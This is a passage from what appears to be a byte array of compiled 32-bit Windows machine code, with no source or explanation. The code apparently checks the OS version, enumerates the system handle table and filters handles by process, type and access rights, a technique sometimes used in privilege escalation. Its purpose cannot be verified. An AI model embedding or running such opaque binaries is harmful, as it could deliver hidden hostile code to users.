00,0xC0,0x8D,0x55,0xB8,0xB8,0x00,0x00,0x00,0x00,0xB9,0x0E,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x38,0x00,0x00,0x00,0x8D,0x45,0xB8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x60,0x30,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x35,0x8B,0x45,0xBC,0x23,0x45,0x0C,0x39,0x45,0x0C,0x75,0x09,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x22,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x2C,0xE5,0x48,0x65,0xE8,0xA5,0xD8,0xFF,0xFF,0xC7,0x04,0x24,0x06,0xE5,0x48,0x65,0xE8,0x99,0xD8,0xFF,0xFF,0xEB,0x01,0x90,0x8B,0x45,0xF4,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0x83,0x7D,0x08,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x65,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x02,0x00,0x00,0x00,0x8B,0x45,0x0C,0x89,0x44,0x24,0x14,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x8D,0x45,0xF0,0x89,0x44,0x24,0x0C,0xC7,0x44,0x24,0x08,0xFF,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x04,0xFF,0xFF,0xFF,0xFF,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xA5,0x2F,0x00,0x00,0x89,0x45,0xF4,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x2C,0x2E,0x00,0x00,0xC7,0x45,0x08,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xF0,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x83,0x7D,0x08,0x00,0x0F,0x84,0x90,0x00,0x00,0x00,0x83,0x7D,0x0C,0x00,0x75,0x07,0xC7,0x45,0xF4,0x02,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x40,0x00,0x00,0x00,0x8D,0x45,0xEC,0x89,0x44,0x24,0x0C,0xC7,0x44,0x24,0x08,0xFF,0xFF,0xFF,0xFF,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xE8,0x0B,0x2F,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x43,0x8B,0x45,0xEC,0x8B,0x55,0xF4,0x89,0x54,0x24,0x18,0x8B,0x55,0x10,0x89,0x54,0x24,0x14,0x8B,0x55,0x0C,0x89,0x54,0x24,0x10,0x8D,0x55,0xE8,0x89,0x54,0x24,0x0C,0xC7,0x44,0x24,0x08,0xFF,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x04,0xFF,0xFF,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xCB,0x2E,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0x08,0x00,0x74,0x0B,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x42,0x2D,0x00,0x00,0x8B,0x45,0xEC,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x30,0x2D,0x00,0x00,0x8B,0x45,0xE8,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0xC7,0x45,0xF4,0x30,0x00,0x00,0x00,0x8B,0x45,0xF4,0x64,0x8B,0x00,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x05,0xA4,0x00,0x00,0x00,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x8B,0x00,0x83,0xF8,0x06,0x77,0x07,0xB8,0x10,0x04,0x00,0x00,0xEB,0x05,0xB8,0x10,0x10,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0xC7,0x45,0xF4,0x30,0x00,0x00,0x00,0x8B,0x45,0xF4,0x64,0x8B,0x00,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x05,0xA4,0x00,0x00,0x00,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x8B,0x00,0x83,0xF8,0x06,0x77,0x07,0xB8,0x80,0x04,0x00,0x00,0xEB,0x05,0xB8,0x80,0x10,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0xC7,0x45,0xF4,0x30,0x00,0x00,0x00,0x8B,0x45,0xF4,0x64,0x8B,0x00,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x05,0xA4,0x00,0x00,0x00,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x8B,0x00,0x83,0xF8,0x06,0x77,0x07,0xB8,0x10,0x04,0x00,0x00,0xEB,0x05,0xB8,0x10,0x10,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xE8,0x23,0xFF,0xFF,0xFF,0x89,0x45,0xEC,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x83,0x7D,0x44,0x00,0x75,0x06,0x83,0x7D,0x48,0x00,0x74,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x05,0xB8,0x00,0x00,0x00,0x00,0x89,0x45,0xDC,0x83,0x7D,0x08,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xE3,0x01,0x00,0x00,0x83,0x7D,0x18,0x00,0x74,0x0E,0xC7,0x45,0x14,0x01,0x00,0x00,0x00,0xC7,0x45,0x10,0x01,0x00,0x00,0x00,0x83,0x7D,0x48,0x00,0x74,0x07,0xC7,0x45,0x10,0x01,0x00,0x00,0x00,0x83,0x7D,0x4C,0x00,0x74,0x04,0x83,0x4D,0xE8,0x02,0x83,0x7D,0x38,0x00,0x75,0x06,0x83,0x7D,0x3C,0x00,0x74,0x10,0x83,0x7D,0xDC,0x00,0x75,0x0A,0xE8,0xE4,0xFE,0xFF,0xFF,0x89,0x45,0xEC,0xEB,0x0E,0x83,0x7D,0x4C,0x00,0x74,0x08,0xE8,0x13,0xFF,0xFF,0xFF,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x89,0x45,0xE0,0x83,0x7D,0x14,0x00,0x74,0x07,0xC7,0x45,0xEC,0x00,0x10,0x00,0x00,0x8B,0x45,0xE8,0x89,0x44,0x24,0x18,0x8B,0x45,0x24,0x89,0x44,0x24,0x14,0x8B,0x45,0x20,0x89,0x44,0x24,0x10,0x8B,0x45,0x1C,0x89,0x44,0x24,0x0C,0x8B,0x45,0x10,0x89,0x44,0x24,0x08,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0x48,0x01,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x0C,0x01,0x00,0x00,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x32,0xFC,0xFF,0xFF,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x84,0xF0,0x00,0x00,0x00,0x83,0x7D,0x14,0x00,0x74,0x46,0x8B,0x45,0xE8,0x89,0x44,0x24,0x08,0x8B,0x45,0xE0,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x17,0xFD,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xC7,0x00,0x00,0x00,0x8B,0x45,0xE0,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xE7,0xFB,0xFF,0xFF,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x75,0x53,0xE9,0xB4,0x00,0x00,0x00,0x83,0x7D,0x38,0x00,0x75,0x0C,0x83,0x7D,0x3C,0x00,0x75,0x06,0x83,0x7D,0x4C,0x00,0x74,0x3C,0x83,0x7D,0xDC,0x00,0x74,0x36,0x8B,0x45,0xE8,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x46,0xFC,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x77,0x8B,0x45,0xE0,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x94,0xFB,0xFF,0xFF,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x74,0x5F,0x83,0x7D,0x38,0x00,0x74,0x1B,0x8B,0x45,0xE8,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xF9,0x0A,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x41,0x83,0x7D,0x3C,0x00,0x74,0x1B,0x8B,0x45,0x40,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xB4,0x0B,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x23,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0x8B,0x45,0x08,0x8B,0x55,0xF0,0x89,0x10,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF4,0x00,0x75,0x11,0x83,0x7D,0xF0,0x00,0x74,0x0B,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x32,0x2A,0x00,0x00,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x83,0x7D,0x1C,0x00,0x75,0x71,0x83,0x7D,0x10,0x00,0x74,0x1E,0x8B,0x45,0x20,0x89,0x44,0x24,0x08,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xE3,0x06,0x00,0x00,0x89,0x45,0xF4,0xEB,0x4D,0x83,0x7D,0x14,0x00,0x75,0x47,0x83,0x7D,0x18,0x00,0x75,0x41,0x83,0x7D,0x08,0x00,0x74,0x26,0x8B,0x45,0x20,0x89,0x44,0x24,0x0C,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xA0,0x00,0x00,0x00,0x89,0x45,0xF4,0xEB,0x15,0x8B,0x45,0x20,0x89,0x44,0x24,0x04,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0x08,0x00,0x00,0x00,0x89,0x45,0xF4,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x8D,0x55,0xF0,0x89,0x54,0x24,0x10,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x8B,0x55,0x0C,0x89,0x54,0x24,0x08,0x8B,0x55,0x08,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x2D,0x29,0x00,0x00,0x89,0x45,0xF4,0x81,0x7D,0xF4,0x1A,0x00,0x00,0x80,0x75,0x1F,0xC7,0x04,0x24,0x64,0xE5,0x48,0x65,0xE8,0x58,0xD3,0xFF,0xFF,0xC7,0x04,0x24,0x06,0xE5,0x48,0x65,0xE8,0x4C,0xD3,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1F,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x12,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xD3,0xEB,0xFF,0xFF,0x85,0xC0,0x74,0x91,0x8B,0x45,0xF0,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x18,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x8B,0x45,0x14,0x89,0x45,0xE4,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xD0,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x8D,0x45,0xD0,0x89,0x44,0x24,0x0C,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8D,0x45,0xF0,0x89,0x04,0x24,0xE8,0x4F,0x28,0x00,0x00,0x89,0x45,0xF4,0x81,0x7D,0xF4,0x0B,0x00,0x00,0xC0,0x75,0x2C,0x83,0x7D,0x10,0x00,0x75,0x1F,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xAC,0xE5,0x48,0x65,0xE8,0x8E,0xD2,0xFF,0xFF,0xC7,0x04,0x24,0x06,0xE5,0x48,0x65,0xE8,0x82,0xD2,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x45,0x81,0x7D,0xF4,0x22,0x00,0x00,0xC0,0x75,0x2C,0x83,0x7D,0x10,0x00,0x75,0x1F,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xD4,0xE5,0x48,0x65,0xE8,0x59,0xD2,0xFF,0xFF,0xC7,0x04,0x24,0x06,0xE5,0x48,0x65,0xE8,0x4D,0xD2,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x10,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xF0,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x34,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE4,0x14,0x00,0x00,0x00,0x8B,0x45,0xE4,0x89,0x45,0xF0,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x5D,0xE4,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xD3,0x00,0x00,0x00,0x8B,0x45,0xE4,0x8D,0x55,0xE4,0x89,0x54,0x24,0x0C,0x89,0x44,0x24,0x08,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x10,0x00,0x00,0x00,0xE8,0x03,0x29,0x00,0x00,0x89,0x45,0xE8,0x81,0x7D,0xE8,0x04,0x00,0x00,0xC0,0x75,0x7E,0x83,0x7D,0xEC,0x00,0x74,0x44,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x7A,0x63,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0xE4,0x89,0x45,0xF0,0x8B,0x5D,0xE4,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x75,0x0A,0xEB,0x29,0x83,0x7D,0xE8,0x00,0x79,0x08,0xEB,0x21,0x90,0xE9,0x47,0xFF,0xFF,0xFF,0x90,0x8B,0x45,0x08,0x8B,0x55,0xEC,0x89,0x10,0x8B,0x55,0xE4,0x8B,0x45,0x0C,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x83,0x7D,0xF4,0x00,0x75,0x50,0x83,0x7D,0xEC,0x00,0x74,0x4A,0x83,0x7D,0xEC,0x00,0x74,0x44,0x8B,0x45,0xE4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xC7,0x62,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x1A,0x8B,0x45,0x08,0x8B,0x55,0xFC,0x8B,0x44,0x90,0x04,0x39,0x45,0x0C,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x13,0x83,0x45,0xFC,0x01,0x8B,0x45,0x08,0x8B,0x00,0x39,0x45,0xFC,0x72,0xDC,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x24,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x24,0x4E,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xA1,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xEB,0x79,0x8B,0x45,0xF0,0xC1,0xE0,0x04,0x89,0xC2,0x8B,0x45,0x08,0x01,0xD0,0x83,0xC0,0x04,0x89,0x45,0xE8,0x8B,0x45,0xE8,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x89,0x44,0x24,0x04,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x4C,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x46,0x8B,0x45,0xEC,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x88,0x13,0x00,0x00,0x76,0x1A,0xC7,0x04,0x24,0xF4,0xE5,0x48,0x65,0xE8,0xD6,0xCF,0xFF,0xFF,0xC7,0x04,0x24,0x06,0xE5,0x48,0x65,0xE8,0xCA,0xCF,0xFF,0xFF,0xEB,0x41,0x8B,0x45,0xE8,0x0F,0xB7,0x18,0x8B,0x45,0xEC,0x8B,0x00,0x8D,0x48,0x01,0x8B,0x55,0xEC,0x89,0x0A,0x0F,0xB7,0xCB,0x8B,0x55,0xEC,0x89,0x4C,0x82,0x04,0x83,0x45,0xF0,0x01,0x8B,0x45,0x08,0x8B,0x00,0x39,0x45,0xF0,0x0F,0x82,0x79,0xFF,0xFF,0xFF,0x8B,0x45,0x0C,0x8B,0x55,0xEC,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x83,0x7D,0xF4,0x00,0x75,0x51,0x83,0x7D,0xEC,0x00,0x74,0x4B,0x83,0x7D,0xEC,0x00,0x74,0x45,0xC7,0x44,0x24,0x08,0x24,0x4E,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x46,0x61,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x34,0xC7,0x45,0xF4,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE8,0x00,0x10,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xF0,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xF0,0x8B,0x5D,0xE8,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA5,0x00,0x00,0x00,0x8B,0x45,0xE8,0x8D,0x55,0xE8,0x89,0x54,0x24,0x10,0x89,0x44,0x24,0x0C,0x8B,0x45,0xEC,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x03,0x00,0x00,0x00,0xC7,0x04,0x24,0x00,0x00,0x00,0x00,0xE8,0x2C,0x26,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x78,0x17,0x8B,0x45,0x08,0x8B,0x55,0xEC,0x89,0x10,0x8B,0x55,0xE8,0x8B,0x45,0x0C,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x5C,0x83,0x7D,0xEC,0x00,0x74,0x44,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x4D,0x60,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x81,0x7D,0xF4,0x04,0x00,0x00,0xC0,0x0F,0x84,0x24,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x34,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x8D,0x45,0xE0,0x89,0x44,0x24,0x04,0x8D,0x45,0xE4,0x89,0x04,0x24,0xE8,0xBC,0xFE,0xFF,0xFF,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x74,0x67,0x8B,0x45,0xE4,0x83,0xC0,0x04,0x89,0x45,0xF0,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xEB,0x49,0x8B,0x45,0xF0,0x8B,0x40,0x04,0x8B,0x55,0x08,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x75,0x14,0x8B,0x45,0xEC,0x8D,0x50,0x02,0x8B,0x45,0x0C,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x27,0x8B,0x45,0xF0,0x0F,0xB7,0x40,0x02,0x0F,0xB7,0xC0,0x83,0xC0,0x03,0x83,0xE0,0xFC,0x83,0xC0,0x60,0x01,0x45,0xF0,0x83,0x45,0xEC,0x01,0x8B,0x45,0xE4,0x8B,0x00,0x39,0x45,0xEC,0x72,0xAD,0xEB,0x01,0x90,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x4B,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x44,0x8B,0x55,0xE0,0x8B,0x45,0xE4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x37,0x5F,0x00,0x00,0x8B,0x5D,0xE4,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x74,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0x8D,0x45,0xB4,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x08,0xE5,0x48,0x65,0xE8,0x8B,0xFE,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0x2A,0x02,0x00,0x00,0x8D,0x45,0xBC,0x89,0x44,0x24,0x04,0x8D,0x45,0xC0,0x89,0x04,0x24,0xE8,0x58,0xFA,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0x0E,0x02,0x00,0x00,0x8B,0x45,0xC0,0x8D,0x55,0xB8,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0xFE,0xFB,0xFF,0xFF,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0xF2,0x01,0x00,0x00,0xC7,0x45,0xCC,0x20,0x00,0x00,0x00,0x8B,0x45,0xCC,0x64,0x8B,0x00,0x89,0x45,0xC8,0x8B,0x45,0xC8,0x89,0x45,0xD4,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xE9,0x96,0x01,0x00,0x00,0x8B,0x45,0xB8,0x8B,0x55,0xE8,0x8B,0x44,0x90,0x04,0x89,0x45,0xD8,0x8B,0x45,0xD8,0x3B,0x45,0xD4,0x0F,0x84,0x6F,0x01,0x00,0x00,0x8B,0x45,0xD8,0x3B,0x45,0x08,0x0F,0x84,0x66,0x01,0x00,0x00,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x5F,0x01,0x00,0x00,0x83,0x7D,0xD8,0x04,0x0F,0x84,0x58,0x01,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xE9,0x11,0x01,0x00,0x00,0x8B,0x45,0xC0,0x8B,0x55,0xE4,0xC1,0xE2,0x04,0x01,0xD0,0x83,0xC0,0x04,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0xD8,0x0F,0x85,0xE0,0x00,0x00,0x00,0x8B,0x45,0xD0,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0xB4,0x39,0xC2,0x0F,0x85,0xCE,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x0C,0x23,0x45,0x0C,0x39,0x45,0x0C,0x0F,0